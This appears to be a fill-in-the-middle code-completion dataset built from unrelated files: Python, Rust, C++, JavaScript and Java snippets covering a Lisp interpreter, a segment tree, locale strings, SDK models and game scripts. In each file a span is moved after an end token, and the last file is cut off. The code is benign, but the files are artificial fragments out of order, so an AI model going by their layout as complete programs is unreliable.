self.param = param
def getfirst(self, name, default=None):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
try:
return self.param.getall(name)[0]
except IndexError:<|fim▁hole|> return default
def getlist(self, name):
""" :See: ``tdi.tools.htmlform.ParameterAdapterInterface`` """
return self.param.getall(name)
class NullParameterAdapter(object):
""" This adapter just returns nothing """
__implements__ = [ParameterAdapterInterface]
def getlist(self, name):
""" :See: `ParameterAdapterInterface.getlist` """
# pylint: disable = unused-argument
return []
def getfirst(self, name, default=None):
""" :See: `ParameterAdapterInterface.getfirst` """
# pylint: disable = unused-argument
return default<|fim▁end|> | |
<|file_name|>01_inventory_not_connected.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2.7
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
''' Sample usage of function 'inventory_not_connected' to show which devices are mounted, but not connected.
Print the function's documentation then invoke the function and print the output.
'''<|fim▁hole|>from pydoc import render_doc as doc
from pydoc import plain
def main():
print(plain(doc(inventory_not_connected)))
print("inventory_not_connected()")
print_table(inventory_not_connected(), headers='device-name')
if __name__ == "__main__":
main()<|fim▁end|> |
from __future__ import print_function as _print_function
from basics.inventory import inventory_not_connected
from basics.render import print_table |
<|file_name|>da.js<|end_file_name|><|fim▁begin|><|fim▁hole|> * any HTML markup tags in the messages must not be converted or translated.
*
* @see http://github.com/kartik-v/bootstrap-fileinput
*
* NOTE: this file must be saved in UTF-8 encoding.
*/
(function ($) {
"use strict";
$.fn.fileinputLocales['da'] = {
fileSingle: 'fil',
filePlural: 'filer',
browseLabel: 'Browse …',
removeLabel: 'Fjern',
removeTitle: 'Fjern valgte filer',
cancelLabel: 'Fortryd',
cancelTitle: 'Afbryd nuværende upload',
uploadLabel: 'Upload',
uploadTitle: 'Upload valgte filer',
msgNo: 'Ingen',
msgNoFilesSelected: '',
msgCancelled: 'aflyst',
msgZoomModalHeading: 'Detaljeret visning',
msgSizeTooLarge: 'Fil "{name}" (<b>{size} KB</b>) er større end de tilladte <b>{maxSize} KB</b>.',
msgFilesTooLess: 'Du skal mindst vælge <b>{n}</b> {files} til upload.',
msgFilesTooMany: '<b>({n})</b> filer valgt til upload, men maks. <b>{m}</b> er tilladt.',
msgFileNotFound: 'Filen "{name}" blev ikke fundet!',
msgFileSecured: 'Sikkerhedsrestriktioner forhindrer læsning af "{name}".',
msgFileNotReadable: 'Filen "{name}" kan ikke indlæses.',
msgFilePreviewAborted: 'Filpreview annulleret for "{name}".',
msgFilePreviewError: 'Der skete en fejl under læsningen af filen "{name}".',
msgInvalidFileType: 'Ukendt type for filen "{name}". Kun "{types}" kan bruges.',
msgInvalidFileExtension: 'Ukendt filtype for filen "{name}". Kun "{extensions}" filer kan bruges.',
msgUploadAborted: 'Filupload annulleret',
msgUploadThreshold: 'Processing...',
msgValidationError: 'Validering Fejl',
msgLoading: 'Henter fil {index} af {files} …',
msgProgress: 'Henter fil {index} af {files} - {name} - {percent}% færdiggjort.',
msgSelected: '{n} {files} valgt',
msgFoldersNotAllowed: 'Drag & drop kun filer! {n} mappe(r) sprunget over.',
msgImageWidthSmall: 'Bredden af billedet "{name}" skal være på mindst {size} px.',
msgImageHeightSmall: 'Højden af billedet "{name}" skal være på mindst {size} px.',
msgImageWidthLarge: 'Bredden af billedet "{name}" må ikke være over {size} px.',
msgImageHeightLarge: 'Højden af billedet "{name}" må ikke være over {size} px.',
msgImageResizeError: 'Kunne ikke få billedets dimensioner for at ændre størrelsen.',
msgImageResizeException: 'Fejl ved at ændre størrelsen på billedet.<pre>{errors}</pre>',
dropZoneTitle: 'Drag & drop filer her …',
dropZoneClickTitle: '<br>(or click to select {files})',
fileActionSettings: {
removeTitle: 'Fjern fil',
uploadTitle: 'Upload fil',
zoomTitle: 'Se detaljer',
dragTitle: 'Move / Rearrange',
indicatorNewTitle: 'Ikke uploadet endnu',
indicatorSuccessTitle: 'Uploadet',
indicatorErrorTitle: 'Upload fejl',
indicatorLoadingTitle: 'Uploader ...'
},
previewZoomButtonTitles: {
prev: 'View previous file',
next: 'View next file',
toggleheader: 'Toggle header',
fullscreen: 'Toggle full screen',
borderless: 'Toggle borderless mode',
close: 'Close detailed preview'
}
};
})(window.jQuery);<|fim▁end|> | /*!
* FileInput Danish Translations
*
* This file must be loaded after 'fileinput.js'. Patterns in braces '{}', or
|
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>extern crate word2vec;
use word2vec::wordvectors::WordVector;
const PATH: &'static str = "vectors.bin";
#[test]
fn test_word_cosine() {
let model = WordVector::load_from_binary(PATH).unwrap();
let res = model.cosine("winter", 10).expect("word not found in vocabulary");
assert_eq!(res.len(), 10);
let only_words: Vec<&str> = res.iter().map(|x| x.0.as_ref()).collect();
assert!(!only_words.contains(&"winter"))
}
#[test]
fn test_unexisting_word_cosine() {
let model = WordVector::load_from_binary(PATH).unwrap();
let result = model.cosine("somenotexistingword", 10);
match result {
Some(_) => assert!(false),
None => assert!(true),
}
}
#[test]
fn test_word_analogy() {
let model = WordVector::load_from_binary(PATH).unwrap();
let mut pos = Vec::new();
pos.push("woman");
pos.push("king");
let mut neg = Vec::new();
neg.push("man");
let res = model.analogy(pos, neg, 10).expect("couldn't find all of the given words");
assert_eq!(res.len(), 10);
let only_words: Vec<&str> = res.iter().map(|x| x.0.as_ref()).collect();
assert!(!only_words.contains(&"woman"));
assert!(!only_words.contains(&"king"));
assert!(!only_words.contains(&"man"));
}
#[test]
fn test_word_analogy_with_empty_params() {
let model = WordVector::load_from_binary(PATH).unwrap();
let result = model.analogy(Vec::new(), Vec::new(), 10);<|fim▁hole|> }
}
#[test]
fn test_word_count_is_correctly_returned() {
let v = WordVector::load_from_binary(PATH).unwrap();
assert_eq!(v.word_count(), 71291);
}<|fim▁end|> | match result {
Some(_) => assert!(false),
None => assert!(true), |
<|file_name|>step6_file.rs<|end_file_name|><|fim▁begin|>#![feature(exit_status)]
extern crate mal;
use std::collections::HashMap;
use std::env as stdenv;
use mal::types::{MalVal, MalRet, MalError, err_str};
use mal::types::{symbol, _nil, string, list, vector, hash_map, malfunc};
use mal::types::MalError::{ErrString, ErrMalVal};
use mal::types::MalType::{Nil, False, Sym, List, Vector, Hash_Map, Func, MalFunc};
use mal::{readline, reader, core};
use mal::env::{env_set, env_get, env_new, env_bind, env_root, Env};
// read
fn read(str: String) -> MalRet {
reader::read_str(str)
}
// eval
fn eval_ast(ast: MalVal, env: Env) -> MalRet {
match *ast {
Sym(_) => env_get(&env, &ast),
List(ref a,_) | Vector(ref a,_) => {
let mut ast_vec : Vec<MalVal> = vec![];
for mv in a.iter() {
let mv2 = mv.clone();
ast_vec.push(try!(eval(mv2, env.clone())));
}
Ok(match *ast { List(_,_) => list(ast_vec),
_ => vector(ast_vec) })
}
Hash_Map(ref hm,_) => {
let mut new_hm: HashMap<String,MalVal> = HashMap::new();
for (key, value) in hm.iter() {
new_hm.insert(key.to_string(),
try!(eval(value.clone(), env.clone())));
}
Ok(hash_map(new_hm))
}
_ => Ok(ast.clone()),
}
}
fn eval(mut ast: MalVal, mut env: Env) -> MalRet {
'tco: loop {
//println!("eval: {}, {}", ast, env.borrow());
//println!("eval: {}", ast);
match *ast {
List(_,_) => (), // continue
_ => return eval_ast(ast, env),
}
// apply list
match *ast {
List(_,_) => (), // continue
_ => return Ok(ast),
}
let tmp = ast;
let (args, a0sym) = match *tmp {
List(ref args,_) => {
if args.len() == 0 {
return Ok(tmp.clone());
}
let ref a0 = *args[0];
match *a0 {
Sym(ref a0sym) => (args, &a0sym[..]),
_ => (args, "__<fn*>__"),
}
},
_ => return err_str("Expected list"),
};
match a0sym {
"def!" => {
let a1 = (*args)[1].clone();
let a2 = (*args)[2].clone();
let r = try!(eval(a2, env.clone()));
match *a1 {
Sym(_) => {
env_set(&env.clone(), a1, r.clone());
return Ok(r);
},
_ => return err_str("def! of non-symbol"),
}
},
"let*" => {
let let_env = env_new(Some(env.clone()));<|fim▁hole|> match *a1 {
List(ref binds,_) | Vector(ref binds,_) => {
let mut it = binds.iter();
while it.len() >= 2 {
let b = it.next().unwrap();
let exp = it.next().unwrap();
match **b {
Sym(_) => {
let r = try!(eval(exp.clone(), let_env.clone()));
env_set(&let_env, b.clone(), r);
},
_ => return err_str("let* with non-symbol binding"),
}
}
},
_ => return err_str("let* with non-list bindings"),
}
ast = a2;
env = let_env.clone();
continue 'tco;
},
"do" => {
let el = list(args[1..args.len()-1].to_vec());
try!(eval_ast(el, env.clone()));
ast = args[args.len() - 1].clone();
continue 'tco;
},
"if" => {
let a1 = (*args)[1].clone();
let c = try!(eval(a1, env.clone()));
match *c {
False | Nil => {
if args.len() >= 4 {
ast = args[3].clone();
continue 'tco;
} else {
return Ok(_nil());
}
},
_ => {
ast = args[2].clone();
continue 'tco;
},
}
},
"fn*" => {
let a1 = args[1].clone();
let a2 = args[2].clone();
return Ok(malfunc(eval, a2, env, a1, _nil()));
},
"eval" => {
let a1 = (*args)[1].clone();
ast = try!(eval(a1, env.clone()));
env = env_root(&env);
continue 'tco;
},
_ => { // function call
let el = try!(eval_ast(tmp.clone(), env.clone()));
let args = match *el {
List(ref args,_) => args,
_ => return err_str("Invalid apply"),
};
return match *args.clone()[0] {
Func(f,_) => f(args[1..].to_vec()),
MalFunc(ref mf,_) => {
let mfc = mf.clone();
let alst = list(args[1..].to_vec());
let new_env = env_new(Some(mfc.env.clone()));
match env_bind(&new_env, mfc.params, alst) {
Ok(_) => {
ast = mfc.exp;
env = new_env;
continue 'tco;
},
Err(e) => err_str(&e),
}
},
_ => err_str("attempt to call non-function"),
}
},
}
}
}
// print
fn print(exp: MalVal) -> String {
exp.pr_str(true)
}
fn rep(str: &str, env: Env) -> Result<String,MalError> {
let ast = try!(read(str.to_string()));
//println!("read: {}", ast);
let exp = try!(eval(ast, env));
Ok(print(exp))
}
fn main() {
// core.rs: defined using rust
let repl_env = env_new(None);
for (k, v) in core::ns().into_iter() {
env_set(&repl_env, symbol(&k), v);
}
// see eval() for definition of "eval"
env_set(&repl_env, symbol("*ARGV*"), list(vec![]));
// core.mal: defined using the language itself
let _ = rep("(def! not (fn* (a) (if a false true)))", repl_env.clone());
let _ = rep("(def! load-file (fn* (f) (eval (read-string (str \"(do \" (slurp f) \")\")))))", repl_env.clone());
// Invoked with command line arguments
let args = stdenv::args();
if args.len() > 1 {
let mv_args = args.skip(2)
.map(|a| string(a))
.collect::<Vec<MalVal>>();
env_set(&repl_env, symbol("*ARGV*"), list(mv_args));
let lf = format!("(load-file \"{}\")",
stdenv::args().skip(1).next().unwrap());
return match rep(&lf, repl_env.clone()) {
Ok(_) => stdenv::set_exit_status(0),
Err(str) => {
println!("Error: {:?}", str);
stdenv::set_exit_status(1);
}
};
}
// repl loop
loop {
let line = readline::mal_readline("user> ");
match line { None => break, _ => () }
match rep(&line.unwrap(), repl_env.clone()) {
Ok(str) => println!("{}", str),
Err(ErrMalVal(_)) => (), // Blank line
Err(ErrString(s)) => println!("Error: {}", s),
}
}
}<|fim▁end|> | let a1 = (*args)[1].clone();
let a2 = (*args)[2].clone(); |
<|file_name|>calculate.cpp<|end_file_name|><|fim▁begin|>#include <iostream>
#include <vector>
using namespace std;
const int MOD = 10007;
class SegmentTree {
struct STNode {
int sum;
int prefix;
int suffix;
int product;
STNode() : sum(0), prefix(0), suffix(0), product(0) {}
};
int size;
vector<STNode> tree;
void update(int index, int val, int root, int left, int right);
int lson(int x) { return x << 1; }
int rson(int x) { return (x << 1) | 1; }
public:
SegmentTree(int n) : size(n), tree(n<<2) {}
void update(int index, int val) { update(index, val, 1, 0, size-1); }
int query() { return tree[1].sum; }
};
void SegmentTree::update(int index, int val, int root, int left, int right) {
if (left == index && left == right) {
tree[root].sum = tree[root].prefix = tree[root].suffix = tree[root].product = val % MOD;
} else {
int mid = left + (right-left)/2;
if (index <= mid)
update(index, val, lson(root), left, mid);
else
update(index, val, rson(root), mid+1, right);
tree[root].sum = (tree[lson(root)].sum + tree[rson(root)].sum + tree[lson(root)].suffix * tree[rson(root)].prefix) % MOD;
tree[root].prefix = (tree[lson(root)].prefix + tree[lson(root)].product * tree[rson(root)].prefix) % MOD;
tree[root].suffix = (tree[rson(root)].suffix + tree[lson(root)].suffix * tree[rson(root)].product) % MOD;
tree[root].product = (tree[lson(root)].product * tree[rson(root)].product) % MOD;
}
}<|fim▁hole|>{
ios::sync_with_stdio(false);
cin.tie(nullptr);
int n, q;
cin >> n >> q;
SegmentTree st(n);
for (int i = 0; i < q; ++i) {
int a, b;
cin >> a >> b;
st.update(a-1, b);
cout << st.query() << '\n';
}
cout << flush;
return 0;
}<|fim▁end|> |
int main(void) |
<|file_name|>configs-multiline_match_arm_forces_block-false.rs<|end_file_name|><|fim▁begin|>// rustfmt-multiline_match_arm_forces_block: false
// Option forces multiline match arm bodies to be wrapped in a block
fn main() {
match lorem {
Lorem::Ipsum => if ipsum {<|fim▁hole|> println!("dolor");
},
Lorem::Dolor => println!("amet"),
}
}<|fim▁end|> | |
<|file_name|>test-branches.py<|end_file_name|><|fim▁begin|>from . import common
import hglib
class test_branches(common.basetest):
def test_empty(self):
self.assertEquals(self.client.branches(), [])
def test_basic(self):
self.append('a', 'a')
rev0 = self.client.commit('first', addremove=True)
self.client.branch('foo')
self.append('a', 'a')
rev1 = self.client.commit('second')
branches = self.client.branches()
expected = []
for r, n in (rev1, rev0):
r = self.client.log(r)[0]<|fim▁hole|> self.assertEquals(branches, expected)
def test_active_closed(self):
pass<|fim▁end|> | expected.append((r.branch, int(r.rev), r.node[:12]))
|
<|file_name|>testUrl.py<|end_file_name|><|fim▁begin|>import urllib2
url = "http://ifolderlinks.ru/404"
req = urllib2.Request(url)<|fim▁hole|>response = urllib2.urlopen(req,timeout=3)
#except urllib2.HTTPError as e:
# print 'The server couldn\'t fulfill the request.'
# print 'Error code: ', e.code
print response.info()
#print response.read()<|fim▁end|> | #try: |
<|file_name|>niche-filling.rs<|end_file_name|><|fim▁begin|>// Copyright 2016 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// compile-flags: -Z print-type-sizes
// compile-pass
// This file illustrates how niche-filling enums are handled,
// modelled after cases like `Option<&u32>`, `Option<bool>` and such.
//
// It uses NonZeroU32 rather than `&_` or `Unique<_>`, because
// the test is not set up to deal with target-dependent pointer width.
//
// It avoids using u64/i64 because on some targets that is only 4-byte
// aligned (while on most it is 8-byte aligned) and so the resulting<|fim▁hole|>// padding and overall computed sizes can be quite different.
#![feature(start)]
#![allow(dead_code)]
use std::num::NonZeroU32;
pub enum MyOption<T> { None, Some(T) }
impl<T> Default for MyOption<T> {
fn default() -> Self { MyOption::None }
}
pub enum EmbeddedDiscr {
None,
Record { pre: u8, val: NonZeroU32, post: u16 },
}
impl Default for EmbeddedDiscr {
fn default() -> Self { EmbeddedDiscr::None }
}
#[derive(Default)]
pub struct IndirectNonZero {
pre: u8,
nested: NestedNonZero,
post: u16,
}
pub struct NestedNonZero {
pre: u8,
val: NonZeroU32,
post: u16,
}
impl Default for NestedNonZero {
fn default() -> Self {
NestedNonZero { pre: 0, val: NonZeroU32::new(1).unwrap(), post: 0 }
}
}
pub enum Enum4<A, B, C, D> {
One(A),
Two(B),
Three(C),
Four(D)
}
#[start]
fn start(_: isize, _: *const *const u8) -> isize {
let _x: MyOption<NonZeroU32> = Default::default();
let _y: EmbeddedDiscr = Default::default();
let _z: MyOption<IndirectNonZero> = Default::default();
let _a: MyOption<bool> = Default::default();
let _b: MyOption<char> = Default::default();
let _c: MyOption<std::cmp::Ordering> = Default::default();
let _b: MyOption<MyOption<u8>> = Default::default();
let _e: Enum4<(), char, (), ()> = Enum4::One(());
let _f: Enum4<(), (), bool, ()> = Enum4::One(());
let _g: Enum4<(), (), (), MyOption<u8>> = Enum4::One(());
0
}<|fim▁end|> | |
<|file_name|>ConnectionListResult.java<|end_file_name|><|fim▁begin|>// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.automation.models;
import com.azure.core.annotation.Fluent;
import com.azure.core.util.logging.ClientLogger;
import com.azure.resourcemanager.automation.fluent.models.ConnectionInner;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonProperty;
import java.util.List;
/** The response model for the list connection operation. */
@Fluent
public final class ConnectionListResult {
@JsonIgnore private final ClientLogger logger = new ClientLogger(ConnectionListResult.class);
/*
* Gets or sets a list of connection.
*/
@JsonProperty(value = "value")
private List<ConnectionInner> value;
/*
* Gets or sets the next link.
*/
@JsonProperty(value = "nextLink")
private String nextLink;
/**
* Get the value property: Gets or sets a list of connection.
*
* @return the value value.
*/
public List<ConnectionInner> value() {<|fim▁hole|>
/**
* Set the value property: Gets or sets a list of connection.
*
* @param value the value value to set.
* @return the ConnectionListResult object itself.
*/
public ConnectionListResult withValue(List<ConnectionInner> value) {
this.value = value;
return this;
}
/**
* Get the nextLink property: Gets or sets the next link.
*
* @return the nextLink value.
*/
public String nextLink() {
return this.nextLink;
}
/**
* Set the nextLink property: Gets or sets the next link.
*
* @param nextLink the nextLink value to set.
* @return the ConnectionListResult object itself.
*/
public ConnectionListResult withNextLink(String nextLink) {
this.nextLink = nextLink;
return this;
}
/**
* Validates the instance.
*
* @throws IllegalArgumentException thrown if the instance is not valid.
*/
public void validate() {
if (value() != null) {
value().forEach(e -> e.validate());
}
}
}<|fim▁end|> | return this.value;
} |
<|file_name|>dataSourceListResult.js<|end_file_name|><|fim▁begin|>/*
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for
* license information.
*
* Code generated by Microsoft (R) AutoRest Code Generator.
* Changes may cause incorrect behavior and will be lost if the code is
* regenerated.<|fim▁hole|>/**
* @class
* Initializes a new instance of the DataSourceListResult class.
* @constructor
* The list data source by workspace operation response.
*
* @member {string} [nextLink] The link (url) to the next page of datasources.
*
*/
class DataSourceListResult extends Array {
constructor() {
super();
}
/**
* Defines the metadata of DataSourceListResult
*
* @returns {object} metadata of DataSourceListResult
*
*/
mapper() {
return {
required: false,
serializedName: 'DataSourceListResult',
type: {
name: 'Composite',
className: 'DataSourceListResult',
modelProperties: {
value: {
required: false,
serializedName: '',
type: {
name: 'Sequence',
element: {
required: false,
serializedName: 'DataSourceElementType',
type: {
name: 'Composite',
className: 'DataSource'
}
}
}
},
nextLink: {
required: false,
serializedName: 'nextLink',
type: {
name: 'String'
}
}
}
}
};
}
}
module.exports = DataSourceListResult;<|fim▁end|> | */
'use strict';
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>__doc__ = """Random number array generators for numarray.
This package was ported to numarray from Numeric's RandomArray and
provides functions to generate numarray of random numbers.
"""<|fim▁hole|>
from RandomArray2 import *<|fim▁end|> | |
<|file_name|>test_compile.py<|end_file_name|><|fim▁begin|>from test_support import verbose, TestFailed
if verbose:
print "Testing whether compiler catches assignment to __debug__"
try:
compile('__debug__ = 1', '?', 'single')
except SyntaxError:
pass
import __builtin__
prev = __builtin__.__debug__
setattr(__builtin__, '__debug__', 'sure')
setattr(__builtin__, '__debug__', prev)
if verbose:
print 'Running tests on argument handling'
try:
exec 'def f(a, a): pass'
raise TestFailed, "duplicate arguments"
except SyntaxError:
pass
try:
exec 'def f(a = 0, a = 1): pass'
raise TestFailed, "duplicate keyword arguments"
except SyntaxError:
pass
try:
exec 'def f(a): global a; a = 1'
raise TestFailed, "variable is global and local"
except SyntaxError:
pass
if verbose:
print "testing complex args"
def comp_args((a, b)):
print a,b
comp_args((1, 2))
def comp_args((a, b)=(3, 4)):
print a, b
comp_args((1, 2))
comp_args()
def comp_args(a, (b, c)):
print a, b, c
comp_args(1, (2, 3))
def comp_args(a=2, (b, c)=(3, 4)):
print a, b, c
comp_args(1, (2, 3))
comp_args()
try:
exec 'def f(a=1, (b, c)): pass'
raise TestFailed, "non-default args after default"
except SyntaxError:
pass
if verbose:
print "testing bad float literals"
def expect_error(s):
try:
eval(s)
raise TestFailed("%r accepted" % s)
except SyntaxError:
pass
expect_error("2e")
expect_error("2.0e+")
expect_error("1e-")
expect_error("3-4e/21")
if verbose:
print "testing literals with leading zeroes"
def expect_same(test_source, expected):
got = eval(test_source)
<|fim▁hole|> (test_source, got, expected))
expect_error("077787")
expect_error("0xj")
expect_error("0x.")
expect_error("0e")
expect_same("0777", 511)
expect_same("0777L", 511)
expect_same("000777", 511)
expect_same("0xff", 255)
expect_same("0xffL", 255)
expect_same("0XfF", 255)
expect_same("0777.", 777)
expect_same("0777.0", 777)
expect_same("000000000000000000000000000000000000000000000000000777e0", 777)
expect_same("0777e1", 7770)
expect_same("0e0", 0)
expect_same("0000E-012", 0)
expect_same("09.5", 9.5)
expect_same("0777j", 777j)
expect_same("00j", 0j)
expect_same("00.0", 0)
expect_same("0e3", 0)
expect_same("090000000000000.", 90000000000000.)
expect_same("090000000000000.0000000000000000000000", 90000000000000.)
expect_same("090000000000000e0", 90000000000000.)
expect_same("090000000000000e-0", 90000000000000.)
expect_same("090000000000000j", 90000000000000j)
expect_error("090000000000000") # plain octal literal w/ decimal digit
expect_error("080000000000000") # plain octal literal w/ decimal digit
expect_error("000000000000009") # plain octal literal w/ decimal digit
expect_error("000000000000008") # plain octal literal w/ decimal digit
expect_same("000000000000007", 7)
expect_same("000000000000008.", 8.)
expect_same("000000000000009.", 9.)
# Verify treatment of unary minus on negative numbers SF bug #660455
expect_same("0xffffffff", -1)
expect_same("-0xffffffff", 1)<|fim▁end|> | if got != expected:
raise TestFailed("eval(%r) gave %r, but expected %r" %
|
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify<|fim▁hole|># it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj<|fim▁end|> | |
<|file_name|>boss_ouro.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2008-2013 TrinityCore <http://www.trinitycore.org/>
* Copyright (C) 2006-2009 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/* ScriptData
SDName: Boss_Ouro
SD%Complete: 85
SDComment: No model for submerging. Currently just invisible.
SDCategory: Temple of Ahn'Qiraj
EndScriptData */
#include "ScriptMgr.h"
#include "ScriptedCreature.h"
#include "temple_of_ahnqiraj.h"
enum Spells
{
SPELL_SWEEP = 26103,
SPELL_SANDBLAST = 26102,
SPELL_GROUND_RUPTURE = 26100,
SPELL_BIRTH = 26262, // The Birth Animation
SPELL_DIRTMOUND_PASSIVE = 26092
};
class boss_ouro : public CreatureScript
{
public:
boss_ouro() : CreatureScript("boss_ouro") { }
CreatureAI* GetAI(Creature* creature) const
{
return new boss_ouroAI (creature);
}
struct boss_ouroAI : public ScriptedAI
{
boss_ouroAI(Creature* creature) : ScriptedAI(creature) {}
uint32 Sweep_Timer;
uint32 SandBlast_Timer;
uint32 Submerge_Timer;
uint32 Back_Timer;
uint32 ChangeTarget_Timer;
uint32 Spawn_Timer;
bool Enrage;
bool Submerged;
void Reset()
{
Sweep_Timer = urand(5000, 10000);
SandBlast_Timer = urand(20000, 35000);
Submerge_Timer = urand(90000, 150000);
Back_Timer = urand(30000, 45000);
ChangeTarget_Timer = urand(5000, 8000);
Spawn_Timer = urand(10000, 20000);
<|fim▁hole|> }
void EnterCombat(Unit* /*who*/)
{
DoCast(me->GetVictim(), SPELL_BIRTH);
}
void UpdateAI(uint32 diff)
{
//Return since we have no target
if (!UpdateVictim())
return;
//Sweep_Timer
if (!Submerged && Sweep_Timer <= diff)
{
DoCast(me->GetVictim(), SPELL_SWEEP);
Sweep_Timer = urand(15000, 30000);
} else Sweep_Timer -= diff;
//SandBlast_Timer
if (!Submerged && SandBlast_Timer <= diff)
{
DoCast(me->GetVictim(), SPELL_SANDBLAST);
SandBlast_Timer = urand(20000, 35000);
} else SandBlast_Timer -= diff;
//Submerge_Timer
if (!Submerged && Submerge_Timer <= diff)
{
//Cast
me->HandleEmoteCommand(EMOTE_ONESHOT_SUBMERGE);
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->setFaction(35);
DoCast(me, SPELL_DIRTMOUND_PASSIVE);
Submerged = true;
Back_Timer = urand(30000, 45000);
} else Submerge_Timer -= diff;
//ChangeTarget_Timer
if (Submerged && ChangeTarget_Timer <= diff)
{
Unit* target = NULL;
target = SelectTarget(SELECT_TARGET_RANDOM, 0);
if (target)
DoTeleportTo(target->GetPositionX(), target->GetPositionY(), target->GetPositionZ());
ChangeTarget_Timer = urand(10000, 20000);
} else ChangeTarget_Timer -= diff;
//Back_Timer
if (Submerged && Back_Timer <= diff)
{
me->RemoveFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
me->setFaction(14);
DoCast(me->GetVictim(), SPELL_GROUND_RUPTURE);
Submerged = false;
Submerge_Timer = urand(60000, 120000);
} else Back_Timer -= diff;
DoMeleeAttackIfReady();
}
};
};
void AddSC_boss_ouro()
{
new boss_ouro();
}<|fim▁end|> | Enrage = false;
Submerged = false; |
<|file_name|>MoleculeTypeAndSourceQualifierCheckTest.java<|end_file_name|><|fim▁begin|>/*******************************************************************************
* Copyright 2012 EMBL-EBI, Hinxton outstation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
******************************************************************************/
package uk.ac.ebi.embl.api.validation.check.sourcefeature;
import static org.junit.Assert.*;
import java.util.Collection;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import uk.ac.ebi.embl.api.entry.Entry;
import uk.ac.ebi.embl.api.entry.EntryFactory;
import uk.ac.ebi.embl.api.entry.feature.Feature;
import uk.ac.ebi.embl.api.entry.feature.FeatureFactory;
import uk.ac.ebi.embl.api.entry.qualifier.Qualifier;
import uk.ac.ebi.embl.api.entry.sequence.Sequence;
import uk.ac.ebi.embl.api.entry.sequence.SequenceFactory;
import uk.ac.ebi.embl.api.storage.DataRow;
import uk.ac.ebi.embl.api.validation.*;
public class MoleculeTypeAndSourceQualifierCheckTest {
private Entry entry;
private Feature source;
private MoleculeTypeAndSourceQualifierCheck check;
@Before
public void setUp() {
ValidationMessageManager
.addBundle(ValidationMessageManager.STANDARD_VALIDATION_BUNDLE);
EntryFactory entryFactory = new EntryFactory();
SequenceFactory sequenceFactory = new SequenceFactory();
FeatureFactory featureFactory = new FeatureFactory();
entry = entryFactory.createEntry();
source = featureFactory.createSourceFeature();
entry.addFeature(source);
Sequence sequence = sequenceFactory.createSequence();
entry.setSequence(sequence);
DataRow dataRow = new DataRow(
